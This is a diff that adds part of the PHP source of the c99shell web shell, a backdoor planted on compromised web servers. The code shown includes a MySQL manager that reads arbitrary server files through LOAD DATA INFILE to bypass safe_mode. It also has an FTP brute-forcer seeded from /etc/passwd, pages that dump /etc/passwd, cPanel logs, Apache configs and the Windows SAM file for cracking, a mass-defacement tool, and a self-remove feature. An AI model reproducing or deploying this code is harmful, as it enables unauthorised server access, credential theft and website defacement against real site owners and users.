+ if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td>Username</td><td align=right>Password&nbsp;</td></tr><form><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td align=right><input type="password" name="sql_passwd" value="" maxlength="64"></td></tr><tr><td>HOST</td><td>PORT</td></tr><tr><td><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
+ else
+ {
+  //Start left panel
+  if (!empty($sql_db))
+  {
+   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_tables($sql_db);
+   if (!$result) {echo mysql_error();}
+   else
+   {
+    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+    $c = 0;
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo "<b>�&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>
+"; mysql_free_result($count); $c++;}
+    if (!$c) {echo "No tables found in database.";}
+   }
+  }
+  else
+  {
+   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_dbs($sql_sock);
+   if (!$result) {echo mysql_error();}
+   else
+   {
+    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
+    echo "<option value=\"\">Databases (...)</option>
+";
+    $c = 0;
+    while ($row = mysql_fetch_row($result)) {echo "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {echo " selected";} echo ">".$row[0]."</option>
+"; $c++;}
+   }
+   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
+  }
+  //End left panel
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
+  //Start center panel
+  if ($sql_db)
+  {
+   echo "<center><b>There are ".$c." tables in this DB (".htmlspecialchars($sql_db).").<br>";
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}}
+   echo "</b></center>";
+
+   $acts = array("","dump");
+
+   if ($sql_act == "query")
+   {
+    echo "<hr size=\"1\" noshade>";
+    if ($submit)
+    {
+     if ((!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+    }
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+    if ((!$submit) or ($sql_act)) {echo "<form method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to  :";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"60\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form>";}
+   }
+   if (in_array($sql_act,$acts))
+   {
+    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>SQL-Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".$SERVER_NAME."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+    if ($sql_act == "newtpl")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+    }
+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();}
+   }
+   elseif ($sql_act == "dump")
+   {
+    $set = array();
+    $set["sock"] = $sql_sock;
+    $set["db"] = $sql_db;
+    $dump_out = "print";               
+    if ($dump_out == "print") {$set["print"] = 1; $set["nl2br"] = 1;}
+    elseif ($dump_out == "download")
+    {
+     @ob_clean();
+     header("Content-type: c99shell");
+     header("Content-disposition: attachment; filename=\"".$f."\";"); 
+     $set["print"] = 1;
+     $set["nl2br"] = 1;
+    }
+    $set["file"] = $dump_file;
+    $set["add_drop"] = true;
+    $ret = mysql_dump($set);
+    if ($dump_out == "download") {exit;}
+   }
+   else
+   {
+    $result = mysql_query("SHOW TABLE STATUS", $sql_sock) or print(mysql_error()); 
+    echo "<br><form method=\"POST\"><TABLE cellSpacing=0 cellPadding=1 bgColor=#333333 borderColorLight=#333333 border=1>";
+    echo "<tr>";
+    echo "<td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td>";
+    echo "<td><center><b>Table</b></center></td>";
+    echo "<td><b>Rows</b></td>";
+    echo "<td><b>Type</b></td>";
+    echo "<td><b>Created</b></td>";
+    echo "<td><b>Modified</b></td>";
+    echo "<td><b>Size</b></td>";
+    echo "<td><b>Action</b></td>";
+    echo "</tr>";
+    $i = 0;
+    $tsize = $trows = 0;
+    while ($row = mysql_fetch_array($result, MYSQL_NUM))
+    {
+     $tsize += $row["5"];
+     $trows += $row["5"];
+     $size = view_size($row["5"]);
+     echo "<tr>";
+     echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row[0]."\"></td>";
+     echo "<td>&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".$row[0]."</b></a>&nbsp;</td>";
+     echo "<td>".$row[3]."</td>";
+     echo "<td>".$row[1]."</td>";
+     echo "<td>".$row[10]."</td>";
+     echo "<td>".$row[11]."</td>";
+     echo "<td>".$size."</td>";
+     echo "<td>
+&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row[0]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" height=\"13\" width=\"11\" border=\"0\"></a>
+&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" height=\"13\" width=\"11\" border=\"0\"></a>
+<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$surl."act=img&img=sql_button_insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;
+</td>";
+     echo "</tr>";
+     $i++;
+    }
+    echo "<tr bgcolor=\"000000\">";
+    echo "<td><center><b>�</b></center></td>";
+    echo "<td><center><b>".$i." table(s)</b></center></td>";
+    echo "<td><b>".$trows."</b></td>";
+    echo "<td>".$row[1]."</td>";
+    echo "<td>".$row[10]."</td>";
+    echo "<td>".$row[11]."</td>";
+    echo "<td><b>".view_size($tsize)."</b></td>";
+    echo "<td></td>";
+    echo "</tr>";
+    echo "</table><hr size=\"1\" noshade><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"actselect\">
+<option>With selected:</option>
+<option value=\"drop\" >Drop</option>
+<option value=\"empty\" >Empty</option>
+<option value=\"chk\">Check table</option>
+<option value=\"Optimize table\">Optimize table</option>
+<option value=\"Repair table\">Repair table</option>
+<option value=\"Analyze table\">Analyze table</option>
+</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form>";
+    mysql_free_result($result);
+   }
+  }
+  }
+  else
+  {
+   $acts = array("","newdb","serverstat","servervars","processes","getfile");
+   if (in_array($sql_act,$acts))
+   {
+    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+   }
+   if (!empty($sql_act))
+   {
+    echo "<hr size=\"1\" noshade>";
+    if ($sql_act == "newdb")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();}
+    }
+    if ($sql_act == "serverstatus")
+    {
+     $result = mysql_query("SHOW STATUS", $sql_sock); 
+     echo "<center><b>Server-status variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+     echo "</table></center>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "servervars")
+    {
+     $result = mysql_query("SHOW VARIABLES", $sql_sock); 
+     echo "<center><b>Server variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "processes")
+    {
+     if (!empty($kill)) {$query = 'KILL ' . $kill . ';'; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock); 
+     echo "<center><b>Processes:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td>STATE</td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    elseif (($sql_act == "getfile"))
+    {
+     if (!mysql_create_db("tmp_bd")) {echo mysql_error();}
+     elseif (!mysql_select_db("tmp_bd")) {echo mysql_error();}
+     elseif (!mysql_query('CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );')) {echo mysql_error();}
+     else {mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); $query = "SELECT * FROM tmp_file"; $result = mysql_query($query); if (!$result) {echo "Error in query \"".$query."\": ".mysql_error();}
+     else
+     {
+      for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+      $f = ""; 
+      while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {foreach ($line as $key =>$col_value) {$f .= $col_value;}}
+      if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b>";}
+      else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f));}
+     }
+     mysql_free_result($result);
+     if (!mysql_drop_db("tmp_bd")) {echo ("Can't drop tempory DB \"tmp_bd\"!");}
+     }
+    }
+   }
+  }
+ }
+ echo "</tr></table></table>";
+}
+if ($act == "mkdir")
+{
+ if ($mkdir != $d) {if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}}
+ echo "<br><br>";
+ $act = $dspact = "ls";
+}
+if ($act == "ftpquickbrute")
+{
+ echo "<b>Ftp Quick brute:</b><br>";
+ if ($win) {echo "This functions not work in Windows!<br><br>";}
+ else
+ {
+  function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
+  {
+   if ($fqb_onlywithsh)
+   {
+    if (!in_array($sh,array("/bin/bash","/bin/sh","/usr/local/cpanel/bin/jailshell"))) {$true = false;}
+    else {$true = true;}
+   }
+   else {$true = true;}
+   if ($true)
+   {
+    $sock = @ftp_connect($host,$port,$timeout);
+    if (@ftp_login($sock,$login,$pass))
+    {
+     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
+     ob_flush();
+     return true;
+    }
+   }
+  }
+  if (!empty($submit))
+  {
+   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+   $fp = fopen("/etc/passwd","r");
+   if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+   else
+   {
+    ob_flush();
+    $i = $success = 0;
+    $ftpquick_st = getmicrotime();
+    while(!feof($fp))
+    { 
+     $str = explode(":",fgets($fp,2048));
+     if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
+     {
+      $success++;
+     }
+     if ($i > $fqb_lenght) {break;}
+     $i++;
+    } 
+    if ($success == 0) {echo "No success. connections!";}
+    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+    echo "<hr size=\"1\" noshade><b>Done!<br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=\"green\"><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br><b>Connects per second: ".round($i/$ftpquick_t,2)."</b><br>";
+   }
+  }
+  else {echo "<form method=\"POST\"><br>Read first: <input type=\"text\" name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br><input type=\"submit\" name=\"submit\" value=\"Brute\"></form>";}
+ }
+}
+if ($act == "lsa")
+{
+ echo "<center><b>Server security information:</b></center>";
+ echo "<b>Software:</b> ".PHP_OS.", ".$SERVER_SOFTWARE."<br>";
+ echo "<b>Safe-Mode: ".$hsafemode."</b><br>";
+ echo "<b>Open base dir: ".$hopenbasedir."</b><br>";
+ if (!$win)
+ {
+  if ($nixpasswd)
+  {
+   if ($nixpasswd == 1) {$nixpasswd = 0;}
+   $num = $nixpasswd + $nixpwdperpage;
+   echo "<b>*nix /etc/passwd:</b><br>";
+   $i = $nixpasswd;
+   while ($i < $num)
+   {
+    $uid = posix_getpwuid($i);
+    if ($uid) {echo join(":",$uid)."<br>";}
+    $i++;
+   }
+  }
+  else {echo "<br><a href=\"".$surl."act=lsa&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
+  if (file_get_contents("/etc/userdomains")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=userdomains&d=/etc/&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
+  if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></font></b><br>";}
+  if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=httpd.conf&d=/usr/local/apache/conf/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+  if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=httpd.conf&d=/etc/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ }
+ else
+ {
+  $v = $_SERVER["WINDIR"]."\repair\sam";
+  if (file_get_contents($v)) {echo "<b><font color=\"red\">You can't crack winnt passwords(".$v.") </font></b><br>";}
+  else {echo "<b><font color=\"green\">You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+.</font></b><br>";}
+ }
+}
+if ($act == "mkfile")
+{
+ if ($mkfile != $d)
+ {
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} $f = basename($mkfile);}
+ }
+ else {$act = $dspact = "ls";}
+}
+if ($act == "fsbuff")
+{
+ $arr_copy = $sess_data["copy"];
+ $arr_cut = $sess_data["cut"];
+ $arr = array_merge($arr_copy,$arr_cut);
+ if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
+ else
+ {
+  echo "<b>File-System buffer</b><br><br>";
+  $ls_arr = $arr;
+  $disp_fullpath = true;
+  $act = "ls";
+ }
+}
+if ($act == "selfremove")
+{
+ if (!empty($submit))
+ {
+  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; exit; }
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
+ }
+ else
+ {
+  $v = array();
+  for($i=0;$i<8;$i++) {$v[] = "<a href=\"".$surl."\"><u><b>NO</b></u></a>";}
+  $v[] = "<a href=\"#\" onclick=\"if (confirm('Are you sure?')) document.location='".$surl."act=selfremove&submit=1';\"><u>YES</u></a>";
+  shuffle($v);
+  $v = join("&nbsp;&nbsp;&nbsp;",$v);
+  echo "<b>Self-remove: ".__FILE__." <br>Are you sure?</b><center>".$v."</center>";
+ }
+}
+if ($act == "massdeface")
+{
+ if (empty($deface_in)) {$deface_in = $d;}
+ if (empty($deface_name)) {$deface_name = "(.*)"; $deface_name_regexp = 1;}
+ if (empty($deface_text_wwo)) {$deface_text_regexp = 0;}
+
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+
+  $text = $deface_text;
+  $text_regexp = $deface_text_regexp;
+  if (empty($text)) {$text = " "; $text_regexp = 1;}
+
+  $a = array
+  (
+   "name"=>$deface_name, "name_regexp"=>$deface_name_regexp,
+   "text"=>$text, "text_regexp"=>$text_regxp,
+   "text_wwo"=>$deface_text_wwo,
+   "text_cs"=>$deface_text_cs,
+   "text_not"=>$deface_text_not
+  );
+  $defacetime = getmicrotime();
+  $in = array_unique(explode(";",$deface_in));
+  foreach($in as $v) {c99fsearch($v);}
+  $defacetime = round(getmicrotime()-$defacetime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+   $ls_arr = $found;
+   $disp_fullpath = true;
+   $act = $dspact = "ls";
+  }
+ }
+ else
+ {
+  if (empty($deface_preview)) {$deface_preview = 1;}
+  if (empty($deface_html)) {$deface_html = "</div></table><br>Mass-defaced with c99shell v. ".$shver.", coded by tristram[<a href=\"http://ccteam.ru\">CCTeaM</a>].</b>";}
+ }
+ echo "<form method=\"POST\">";
+ if (!$submit) {echo "<big><b>Attention! It's a very dangerous feature, you may lost your data.</b></big><br><br>";}
+ echo "<input type=\"hidden\" name=\"d\" value=\"".$dispd."\">
+<b>Deface for (file/directory name): </b><input type=\"text\" name=\"deface_name\" size=\"".round(strlen($deface_name)+25)."\" value=\"".htmlspecialchars($deface_name)."\">&nbsp;<input type=\"checkbox\" name=\"deface_name_regexp\" value=\"1\" ".gchds($deface_name_regexp,1," checked")."> - regexp
+<br><b>Deface in (explode \";\"): </b><input type=\"text\" name=\"deface_in\" size=\"".round(strlen($deface_in)+25)."\" value=\"".htmlspecialchars($deface_in)."\">
+<br><br><b>Search text:</b><br><textarea name=\"deface_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_text)."</textarea>
+<br><br><input type=\"checkbox\" name=\"deface_text_regexp\" value=\"1\" ".gchds($deface_text_regexp,1," checked")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_wwo\" value=\"1\" ".gchds($deface_text_wwo,1," checked")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_cs\" value=\"1\" ".gchds($deface_text_cs,1," checked")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_not\" value=\"1\" ".gchds($deface_text_not,1," checked")."> - find files <u>NOT</u> containing the text
+<br><input type=\"checkbox\" name=\"deface_preview\" value=\"1\" ".gchds($deface_preview,1," checked")."> - <b>PREVIEW AFFECTED FILES</b>
+<br><br><b>Html of deface:</b><br><textarea name=\"deface_html\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_html)."</textarea>
+<br><br><input type=\"submit\" name=\"submit\" value=\"Deface\"></form>";
+ if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Deface took ".$defacetime." secs</b><br><br>";}
+}
+if ($act == "search")
+{
+ if (empty($search_in)) {$search_in = $d;}
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+  $a = array
+  (
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp,
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp,
+   "text_wwo"=>$search_text_wwo,
+   "text_cs"=>$search_text_cs,
+   "text_not"=>$search_text_not
+  );
+  $searchtime = getmicrotime();
+  $in = array_unique(explode(";",$search_in));
+  foreach($in as $v)
+  {
+   c99fsearch($v);
+  }
+  $searchtime = round(getmicrotime()-$searchtime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+   $ls_arr = $found;
+   $disp_fullpath = true;
+   $act = $dspact = "ls";
+  }
+ }
+ echo "<form method=\"POST\">
+<input type=\"hidden\" name=\"d\" value=\"".$dispd."\">
+<b>Search for (file/directory name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".gchds($search_name_regexp,1," checked")."> - regexp
+<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
+<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".gchds($search_text_regexp,1," checked")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".gchds($search_text_wwo,1," checked")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".gchds($search_text_cs,1," checked")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".gchds($search_text_not,1," checked")."> - find files <u>NOT</u> containing the text
+<br><br><input type=\"submit\" name=\"submit\" value=\"Search\"></form>";
+ if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs</b><br><br>";}
+}
+if ($act == "chmod")
+{
+ $perms = fileperms($d.$f);
+ if (!$perms) {echo "Can't get current mode.";}
+ elseif ($submit)
+ {
+  if (!isset($owner[0])) {$owner[0] = 0;}
+  if (!isset($owner[1])) {$owner[1] = 0; }
+  if (!isset($owner[2])) {$owner[2] = 0;}
+  if (!isset($group[0])) {$group[0] = 0;}
+  if (!isset($group[1])) {$group[1] = 0;}
+  if (!isset($group[2])) {$group[2] = 0;}
+  if (!isset($world[0])) {$world[0] = 0;}
+  if (!isset($world[1])) {$world[1] = 0;}
+  if (!isset($world[2])) {$world[2] = 0;}
+  $sum_owner = $owner[0] + $owner[1] + $owner[2];
+  $sum_group = $group[0] + $group[1] + $group[2];
+  $sum_world = $world[0] + $world[1] + $world[2];
+  $sum_chmod = "0".$sum_owner.$sum_group.$sum_world;
+  $ret = @chmod($d.$f, $sum_chmod);
+  if ($ret) {$act = "ls";}
+  else {echo "<b>Changing file-mode (".$d.$f.")</b>: error<br>";}
+ }
+ else
+ {
+  echo "<b>Changing file-mode</b><br>";
+  $perms = view_perms(fileperms($d.$f));
+  $length = strlen($perms);
+  $owner_r = $owner_w = $owner_x =
+  $group_r = $group_w = $group_x = 
+  $world_r = $world_w = $group_x = "";
+
+  if ($perms[1] == "r") {$owner_r = " checked";} if ($perms[2] == "w") {$owner_w = " checked";}
+  if ($perms[3] == "x") {$owner_x = " checked";} if ($perms[4] == "r") {$group_r = " checked";}
+  if ($perms[5] == "w") {$group_w = " checked";} if ($perms[6] == "x") {$group_x = " checked";}
+  if ($perms[7] == "r") {$world_r = " checked";} if ($perms[8] == "w") {$world_w = " checked";}
+												 if ($perms[9] == "x") {$world_x = " checked";}
+  echo "<form method=\"POST\"><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value='".htmlspecialchars($f)."'>
+<input type=hidden name=act value=chmod><input type=hidden name=submit value=1><input type=hidden name='owner[3]' value=no_error>
+<input type=hidden name='group[3]' value=no_error><input type=hidden name='world[3]' value=no_error>
+<table><tr><td><table align=center width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br>
+<input type=checkbox NAME=owner[0] value=4".$owner_r.">Read<br><input type=checkbox NAME=owner[1] value=2".$owner_w.">Write<br>
+<input type=checkbox NAME=owner[2] value=1".$owner_x.">Execute</font></td><td><b>Group</b><br><br>
+<input type=checkbox NAME=group[0] value=4".$group_r.">Read<br>
+<input type=checkbox NAME=group[1] value=2".$group_w.">Write<br>
+<input type=checkbox NAME=group[2] value=1".$group_x.">Execute</font></td>
+<td><b>World</b><br><br><input type=checkbox NAME=world[0] value=4".$world_r.">Read<br>
+<input type=checkbox NAME=world[1] value=2".$world_w.">Write<br>
+<input type=checkbox NAME=world[2] value=1".$world_x.">Execute</font></td>
+</tr></table></td></tr><tr align=center><td><input type=submit name=chmod value=\"Save\"></td></tr></table></FORM>";
+ }
+}
+if ($act == "upload")
+{
+ $uploadmess = "";
